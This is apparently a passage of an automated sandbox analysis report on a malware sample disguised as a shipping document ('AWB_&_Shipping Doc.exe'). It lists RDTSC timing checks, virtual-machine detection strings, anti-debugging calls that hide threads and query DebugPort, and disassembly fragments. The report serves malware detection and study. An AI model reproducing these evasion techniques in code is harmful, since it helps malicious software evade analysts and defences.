    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeRDTSC instruction interceptor: First address: 00000000006340DA second address: 00000000006340DA instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007F6200A526C8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f cmp dl, cl 0x00000021 pop ecx 0x00000022 test edi, 83F80AC1h 0x00000028 add edi, edx 0x0000002a test ch, bh 0x0000002c dec ecx 0x0000002d cmp ecx, 00000000h 0x00000030 jne 00007F6200A526A6h 0x00000032 cmp dh, FFFFFFAEh 0x00000035 push ecx 0x00000036 call 00007F6200A526E6h 0x0000003b call 00007F6200A526DAh 0x00000040 lfence 0x00000043 mov edx, dword ptr [7FFE0014h] 0x00000049 lfence 0x0000004c ret 0x0000004d mov esi, edx 0x0000004f pushad 0x00000050 rdtsc
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeRDTSC instruction interceptor: First address: 00000000006340FC second address: 00000000006340FC instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007F6200A4A560h 0x0000001f popad 0x00000020 call 00007F6200A4A1B5h 0x00000025 lfence 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeRDTSC instruction interceptor: First address: 00000000005640FC second address: 00000000005640FC instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007F6200A52AD0h 0x0000001f popad 0x00000020 call 00007F6200A52725h 0x00000025 lfence 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
    Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
    Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E186DE6 rdtsc 1_2_1E186DE6
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeAPI coverage: 8.6 %
    Source: C:\Windows\SysWOW64\cscript.exeAPI coverage: 8.6 %
    Source: C:\Windows\explorer.exe TID: 6600Thread sleep time: -56000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\cscript.exe TID: 4308Thread sleep time: -36000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exeLast function: Thread delayed
    Source: C:\Windows\explorer.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: explorer.exe, 00000003.00000000.274294793.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
    Source: AWB_&_Shipping Doc.exe, 00000000.00000002.235846059.000000000470A000.00000004.00000001.sdmp, AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
    Source: explorer.exe, 00000003.00000000.273517404.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: AWB_&_Shipping Doc.exe, 00000000.00000002.235846059.000000000470A000.00000004.00000001.sdmp, AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
    Source: AWB_&_Shipping Doc.exe, 00000000.00000002.235846059.000000000470A000.00000004.00000001.sdmp, AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
    Source: AWB_&_Shipping Doc.exe, 00000001.00000003.250109532.0000000000A6E000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
    Source: explorer.exe, 00000003.00000000.274294793.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
    Source: explorer.exe, 00000003.00000002.481943204.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
    Source: AWB_&_Shipping Doc.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: explorer.exe, 00000003.00000000.273517404.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: AWB_&_Shipping Doc.exe, 00000000.00000002.235846059.000000000470A000.00000004.00000001.sdmp, AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
    Source: AWB_&_Shipping Doc.exe, 00000001.00000002.297452586.0000000000A28000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWH2
    Source: explorer.exe, 00000003.00000002.481943204.0000000005603000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: AWB_&_Shipping Doc.exe, 00000000.00000002.235846059.000000000470A000.00000004.00000001.sdmp, AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
    Source: explorer.exe, 00000003.00000000.264895195.0000000004E61000.00000004.00000001.sdmpBinary or memory string: Prod_VMware_SATA^
    Source: explorer.exe, 00000003.00000000.274294793.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
    Source: explorer.exe, 00000003.00000000.273945065.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
    Source: AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
    Source: AWB_&_Shipping Doc.exe, 00000000.00000002.235846059.000000000470A000.00000004.00000001.sdmp, AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
    Source: AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmpBinary or memory string: vmicvss
    Source: explorer.exe, 00000003.00000000.266167405.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
    Source: explorer.exe, 00000003.00000000.274294793.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
    Source: explorer.exe, 00000003.00000000.274465279.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
    Source: explorer.exe, 00000003.00000000.273517404.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: AWB_&_Shipping Doc.exe, 00000000.00000002.235846059.000000000470A000.00000004.00000001.sdmp, AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
    Source: AWB_&_Shipping Doc.exe, 00000000.00000002.235846059.000000000470A000.00000004.00000001.sdmp, AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
    Source: AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat
    Source: explorer.exe, 00000003.00000000.273517404.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging:

    barindex
    Contains functionality to hide a thread from the debuggerShow sources
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_00560427 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,000000001_2_00560427
    Hides threads from debuggersShow sources
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeThread information set: HideFromDebuggerJump to behavior
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeThread information set: HideFromDebuggerJump to behavior
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeThread information set: HideFromDebuggerJump to behavior
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E186DE6 rdtsc 1_2_1E186DE6
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E18967A LdrInitializeThunk,1_2_1E18967A
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E17A61C mov eax, dword ptr fs:[00000030h]1_2_1E17A61C
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E17A61C mov eax, dword ptr fs:[00000030h]1_2_1E17A61C
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E14C600 mov eax, dword ptr fs:[00000030h]1_2_1E14C600
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E14C600 mov eax, dword ptr fs:[00000030h]1_2_1E14C600
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E14C600 mov eax, dword ptr fs:[00000030h]1_2_1E14C600
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E178E00 mov eax, dword ptr fs:[00000030h]1_2_1E178E00
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1FFE3F mov eax, dword ptr fs:[00000030h]1_2_1E1FFE3F
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E201608 mov eax, dword ptr fs:[00000030h]1_2_1E201608
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E14E620 mov eax, dword ptr fs:[00000030h]1_2_1E14E620
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]1_2_1E157E41
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]1_2_1E157E41
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]1_2_1E157E41
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]1_2_1E157E41
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]1_2_1E157E41
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]1_2_1E157E41
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E20AE44 mov eax, dword ptr fs:[00000030h]1_2_1E20AE44
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E20AE44 mov eax, dword ptr fs:[00000030h]1_2_1E20AE44
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E16AE73 mov eax, dword ptr fs:[00000030h]1_2_1E16AE73
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E16AE73 mov eax, dword ptr fs:[00000030h]1_2_1E16AE73
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E16AE73 mov eax, dword ptr fs:[00000030h]1_2_1E16AE73
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E16AE73 mov eax, dword ptr fs:[00000030h]1_2_1E16AE73
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E16AE73 mov eax, dword ptr fs:[00000030h]1_2_1E16AE73
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E15766D mov eax, dword ptr fs:[00000030h]1_2_1E15766D
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E210EA5 mov eax, dword ptr fs:[00000030h]1_2_1E210EA5
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E210EA5 mov eax, dword ptr fs:[00000030h]1_2_1E210EA5
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E210EA5 mov eax, dword ptr fs:[00000030h]1_2_1E210EA5
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1DFE87 mov eax, dword ptr fs:[00000030h]1_2_1E1DFE87
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1C46A7 mov eax, dword ptr fs:[00000030h]1_2_1E1C46A7
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1736CC mov eax, dword ptr fs:[00000030h]1_2_1E1736CC
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1FFEC0 mov eax, dword ptr fs:[00000030h]1_2_1E1FFEC0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E188EC7 mov eax, dword ptr fs:[00000030h]1_2_1E188EC7
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E218ED6 mov eax, dword ptr fs:[00000030h]1_2_1E218ED6
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1716E0 mov ecx, dword ptr fs:[00000030h]1_2_1E1716E0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1576E2 mov eax, dword ptr fs:[00000030h]1_2_1E1576E2
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E16F716 mov eax, dword ptr fs:[00000030h]1_2_1E16F716
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1DFF10 mov eax, dword ptr fs:[00000030h]1_2_1E1DFF10
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1DFF10 mov eax, dword ptr fs:[00000030h]1_2_1E1DFF10
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E17A70E mov eax, dword ptr fs:[00000030h]1_2_1E17A70E
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E17A70E mov eax, dword ptr fs:[00000030h]1_2_1E17A70E
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E17E730 mov eax, dword ptr fs:[00000030h]1_2_1E17E730
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E16B73D mov eax, dword ptr fs:[00000030h]1_2_1E16B73D
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E16B73D mov eax, dword ptr fs:[00000030h]1_2_1E16B73D
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E21070D mov eax, dword ptr fs:[00000030h]1_2_1E21070D
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E21070D mov eax, dword ptr fs:[00000030h]1_2_1E21070D
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E144F2E mov eax, dword ptr fs:[00000030h]1_2_1E144F2E
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E144F2E mov eax, dword ptr fs:[00000030h]1_2_1E144F2E
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E218F6A mov eax, dword ptr fs:[00000030h]1_2_1E218F6A
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E15EF40 mov eax, dword ptr fs:[00000030h]1_2_1E15EF40
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E15FF60 mov eax, dword ptr fs:[00000030h]1_2_1E15FF60
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E158794 mov eax, dword ptr fs:[00000030h]